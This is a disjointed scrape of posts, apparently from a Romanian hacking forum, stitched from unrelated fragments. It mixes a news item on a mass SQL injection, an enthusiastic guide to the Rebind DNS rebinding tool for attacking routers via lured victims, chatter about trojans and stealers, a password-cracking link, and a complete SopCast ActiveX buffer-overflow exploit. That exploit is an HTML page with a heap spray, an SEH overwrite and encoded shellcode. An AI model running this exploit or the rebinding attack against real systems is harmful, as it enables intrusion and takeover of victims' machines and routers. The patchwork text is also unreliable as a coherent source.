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A massive SQL injection attack has hacked and infected 500,000 legitimate websites with malware. Tech news site The Register has reported that the SQL injection attack attempts to install hidden code in the websites database, which is used to redirect users to malware. The attack has also affected two web pages belonging to Apple, which are used by the company to promote podcasts on iTunes. The malicious links are reported to have been removed from the webpages shortly after the attack was reported. In total, around 538,000 websites have been affected by the SQL hack attack, and the number of websites that are affected by a similar attack which redirects users to a different domain is close to 500,000. In a statement to The Register, Mary Landesman, a senior researcher with ScanSafe, said: “Interestingly, many of the sites compromised have been involved in repeated compromises over the past few months. It's not clear whether these are the work of the same attackers or are competing attacks.” Read more: SQL Attack hacks 500,000 Sites, Including Apple - ITProPortal.com
Care-i faza cu CV-ul ?
Mi-am tot dorit sa-mi fac un manager de genul, simplu, in ahk. Poate poate ma reapuc de scripting.
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la voi nu se vede ca eu le-am sters ?
cred ca aveti dreptate, nu se stie niciodata cand pica bine sa ai totul instalat, doar cat descarci si rulezi. ce-ar fi sa facem un pachet separat cu programele ce nu necesita instalare ? alea sa fie descarcate separat, iar ce nu se poate rula astfel sa fie instalat in sistem.
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paseaza-mi fisierul sa mai vad ce se mai poate adauga (y! im)
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cred ca eu o sa ma concentrez pe a-l face mai rapid si mai mic
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YouTube - Fortuna Imperatrix Mundi O Fortuna
cata memorie papa rstcore (din taskmanagerul din windows xp virtualizat) si cata memorie papa virtualbox-ul din mandriva ?
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This project is WOW! Simply WOW! We just loved this tool at the first instance itself. The author has taken into consideration about all the things that you might face when running this tool and packaged it all into an open source application – Rebind. The package contains all the necessary libraries and a Firefox Greasemonkey script that will make it easier for you to run this tool. Rebind is a DNS rebinding tool, that implements the multiple “A” record DNS rebinding attacks. It can let you access a target router’s internal Web interface! The best part is remote administration does not need to be enabled for this attack to work! All that is required is that a user inside the target network surf to a Web site that is controlled, or has been compromised, by you. You could possibly use social engineering tricks to trick a user into viewing this web site. It does not require prior knowledge of the target router or the router’s configuration settings such as make, model, IP address, host name, etc, and does not use any anti-DNS pinning techniques. Rebind integrates a DNS server, two Web servers and an HTTP proxy server into a single Linux binary. A simple explanation about how DNS rebinding works: Now, how do you get it to work. In the authors words - “Actually, you need to configure your domain to use Rebind as your primary DNS server. This is done in two steps: first, you need to register the machine that you intend to run Rebind from as a nameserver, then you must configure your domain to use that nameserver. Most registrars will let you perform both of these actions, although some don’t and many make it difficult to find these settings, so you may have to search around a little. Go to the registrar where you registered your domain name (Host-Unlimited, GoDaddy, Yahoo, etc.) and first register two nameservers. You will want to register two because most registrars will require your domain to have at least two nameservers, and you want Rebind to handle all DNS lookups. Name the nameservers ns1 and ns2 and set their IP addresses to that of the machine from where you intend to run Rebind. Once you have registered your nameservers, go do your domain DNS settings and set these nameservers as the authoritative nameservers for your domain. If for example your domain is ‘mydomain.com’, you will enter ns1.mydomain.com and ns2.mydomain.com. Now all DNS traffic will be directed to the machine where you intend to run Rebind, which will allow Rebind to accept and handle all DNS requests for your domain.” Rebind has been specially programmed to work with only Linux operating systems. So, it might work on BSD, but NOT on Windows. It will also work on 64-bit operating systems. Only pre-requisite is that, it must be run as root, and you must have iptables installed and listed in $PATH. It has all images filtered out. It will not work with IPv6 either. Considering that we have another year for IPv6 to be popular, we might as well play with it for now! About time every one gets serious with router security! Remember! You have to have the end-user visit http://your-domain-name/init and not just http://your-domain-name/. (We actually were left wondering about that!) Enjoy the current release – Rebind v0.3.4 here.
ti-am mutat topicul acolo, in caz ca n-ai observat ! http://rstcenter.com/forum/18445-postati-aici-hashurile.rst
io beau bere pe buda si-mi vin idei. //not joking
<html> <Center> <H1>Sopcast POC by Sud0<br></H1> <b>Tested on XP SP3 EN on VBox with IE 7<br> Spraying a lot to get a nice unicode usable address 0x20260078<br> I sprayed with a set of P/P/R instructions to come back to the stack<br> ***Need internet connection on the box to trigger the vuln***<br> Wait for the Spray to finish (IE will seem freezed for some seconds)<br> The Sopcast control will be loaded and shown on the page<br> wait approx 3 to 5 seconds and a message box should appear<br> </b> </Center> <!-- # Exploit Title : SopCast BOF # Date : August 10, 2010 # Author : Sud0 # Bug found by : Sud0 # Software Link : http://www.sopcast.com - http://www.easetuner.com # Version : 3.2.9 # OS : Windows # Tested on : XP SP3 En (VirtualBox) Fully Patched, Internet Explorer 7 # Type of vuln : Stack Buffer Overflow - SEH # Advisory : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-059 # Big thanks to : my wife for supporting me # Greetz to : Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ |------------------------------------------------------------------| | __ __ | | _________ ________ / /___ _____ / /____ ____ _____ ___ | | / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ | | / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / | | \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ | | | | http://www.corelan.be:8800 | | security@corelan.be | | | |-------------------------------------------------[ EIP Hunters ]--| Script provided 'as is', without any warranty. Use for educational purposes only. Do not use this code to do anything illegal ! Corelan does not want anyone to use this script for malicious and/or illegal purposes Corelan cannot be held responsible for any illegal use. Note : you are not allowed to edit/modify this code. If you do, Corelan cannot be held responsible for any damages this may cause. --> <object classid='clsid:8FEFF364-6A5F-4966-A917-A3AC28411659' id='boom' ></object> <script> // ######################################### Begin of spraying with (nops + Pop/Pop/Ret) instructions to come back to the stack var nops = unescape("%49%41"); // some nice nops on ECX var ppr = unescape("%49%58%49%58%49%c3"); // Pop EAX / pop EAX / Ret var ppraddy = 0x20260078; var BlockSize = 0x200000; var BlockHeaderSize = 0x26; var PPRSize = 0x6; var nopSize = BlockSize - (PPRSize + BlockHeaderSize); var heapBlocks = (ppraddy+BlockSize*2)/(BlockSize*2); var Spray = new Array(); while (nops.length<nopSize) { nops += nops; } nops = nops.substring(0,nopSize); for (i=0;i<heapBlocks;i++) { Spray[i] = nops + ppr; } // ######################################### end of spraying var buffSize = 522; // (516 + 6 = sop:// )offset to overwrite EIP var x="sop://"; while (x.length<buffSize) x += unescape("%41"); x+=unescape("%41"); x+=unescape("%41"); x+=unescape("%87"); //low unicode bytes of seh destination address 0035 (0x20260087) x+=""; //High unicode bytes of seh destination address 2026 (0x20260087) x+=unescape("%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49"); x+=unescape("%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A"); x+=unescape("%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49"); x+=unescape("%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%52%49%c3"); // some junk before shellcode for (i=0;i<330;i++) { x+=unescape("%41"); } // messagebox shellcode x+="RRYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIA"; x+="IQI111AIAJQYAZBABABABABkMAGB9u4JBfyjK3kXYRTLdKDNQyBx2pzlqGYS4DKPqlpBkQfzl2kpvMLTKq6LH4KqnmP"; x+="TKMfNXNoLXrUL3Ny9qXQKOYQc0bkplo4nDrk15oLTKPTKUD8KQXj2kMzlX4K1JkpyqjK7sp7OY4KMdtKKQZNLqIomaw"; x+="PilVLRdWPBTlJ6a6olMJawWHil1YoKOKOmk3LKtMXSEgnRkojO4YqZK0fBkzlpKRkqJKlm1JKdKitRkkQxhe9oTLdML"; x+="31es6RKXKywdsY9UCYfbOx2npNZnzLpR8h5LkOKOkOQyQ5kT5kSNj8yRBSSWmLo4nrxhdKKOKOKOe9oUkXoxRLplMPK"; x+="O1XLsnRnNs41Xaet3REbRQx1LmTkZSYK6pVKOPULDqyWRPPWKSxg2Nm5lQwklktPRYXqN9okOYo38PlaQPnQH2HPCrO"; x+="2RqUNQ9KrhqLMTlG1yGsQXnPpXkpKp1XKpNs45s4OxQTmPOrQiQXpoOysDouQXMucHRPPllqWYrhPLktKaQy7qNQ6rN"; x+="rpSpQqBkOvpNQgPB0ioNuyxkZA"; // some junk after shellcode for (i=0;i<40000;i++) { x+=unescape("%41"); } // calling the boom boom.ChannelName=x; // setting channel name boom.SetSopAddress(x); // getting address to trigger the boom </script> </html>
tot iti fura ce are de furat
is curios cand apar cate 5-6 raturi bindate cu un stealer de la vreo 500kb, o sa vezi ca apar executabile de 10-20 MB ))))))
asta pare mai inofensiv decat celelalte versiuni postate ieri Anubis - Analysis Report rulati-l doar intr-un mediu virtual RSTcore sa nu mai aud comentarii ca e trojan si/sau e bindat, decat daca il analizati amanuntit.
urcati-l pe Anubis: Analyzing Unknown Binaries si postati un link (dupa ce ati dezarhivat arhiva) fara presimtiri. sau testezi si aduci argumente, sau iti tii gura.
un francez ce ia ban in clipa asta
http://rstcenter.com/forum/programe-hack/9677-windows-admin-password-2.html#post71721 + tabelele de cateva mii de dolari : http://rstcenter.com/forum/24693-ophcrack-rainbow-tables-ws-20k-nthash.rst citeste baiete tot threadul.
The below article explains how I used password fingerprinting to crack 500,000 password hashes in less than half a day completly automated. This article shows each command step by step, but only to describe the details of how password fingerprinting with oclHashcat works. The reality is that the password fingerprinting process can easily be automated by a script which is why we call it automated password cracking. read it all : Automated Password Cracking: Use oclHashcat To Launch A Fingerprint Attack
are backdoor Anubis - Analysis Report
face ban VirusTotal - Free Online Virus, Malware and URL Scanner http://anubis.iseclab.org/?action=result&task_id=1802d4a52a98661d499482726e48bd4ff&format=html
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